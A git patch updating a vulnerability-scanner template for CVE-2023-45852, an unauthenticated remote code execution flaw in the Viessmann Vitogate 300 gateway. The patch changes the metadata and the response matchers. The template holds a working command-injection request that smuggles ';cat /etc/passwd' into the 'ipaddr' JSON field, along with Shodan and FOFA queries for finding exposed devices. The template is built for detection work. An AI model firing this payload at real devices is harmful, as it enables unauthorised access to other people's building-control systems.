From 25ad1850f76a3dbfda5a7e130adf51065c2a5f47 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 20 Oct 2023 21:06:05 +0530
Subject: [PATCH] updated matcher

---
 http/cves/2023/CVE-2023-4582.yaml | 37 ++++++++++++-------------------
 1 file changed, 14 insertions(+), 23 deletions(-)

diff --git a/http/cves/2023/CVE-2023-4582.yaml b/http/cves/2023/CVE-2023-4582.yaml
index bba0c7394f..59ec128c7f 100644
--- a/http/cves/2023/CVE-2023-4582.yaml
+++ b/http/cves/2023/CVE-2023-4582.yaml
@@ -1,14 +1,15 @@
 id: CVE-2023-45852
+
 info:
-  name: Viessmann Vitogate 300 - Unauthenticated Remote Code Execution
-  author: iamnoooob, rootxharsh, pdresearch
+  name: Viessmann Vitogate 300 - Remote Code Execution
+  author: iamnoooob,rootxharsh,pdresearch
   severity: critical
   description: |
     In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.
   reference:
     - https://connectivity.viessmann.com/gb/mp-fp/vitogate/vitogate-300-bn-mb.html
     - https://github.com/Push3AX/vul/blob/main/viessmann/Vitogate300_RCE.md
-  tags: rce,vitogate
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-45852
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -18,11 +19,10 @@ info:
   metadata:
     verified: true
     max-request: 1
+    shodan-query: title:"Vitogate 300"
+    fofa-query: title="Vitogate 300"
     vendor: Viessmann
-    shodan-query: title="Vitogate 300"
-
-variables:
- marker: "{{randstr}}"
+  tags: cve,cve2023,rce,vitogate
 
 http:
   - raw:
@@ -31,21 +31,12 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"{{marker}};cat /etc/passwd"}}
+        {"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"{{randstr}};cat /etc/passwd"}}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - 'traceroute: {{marker}}: Unknown host'
-          - 'daemon:x:1:1:'
-
-      - type: word
-        part: header
-        words:
-          - 'Content-Type: application/json'
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(header, "application/json")'
+          - 'contains_all(body, "traceroute: {{randstr}}: Unknown host", "daemon:x:1:1:")'
+        condition: and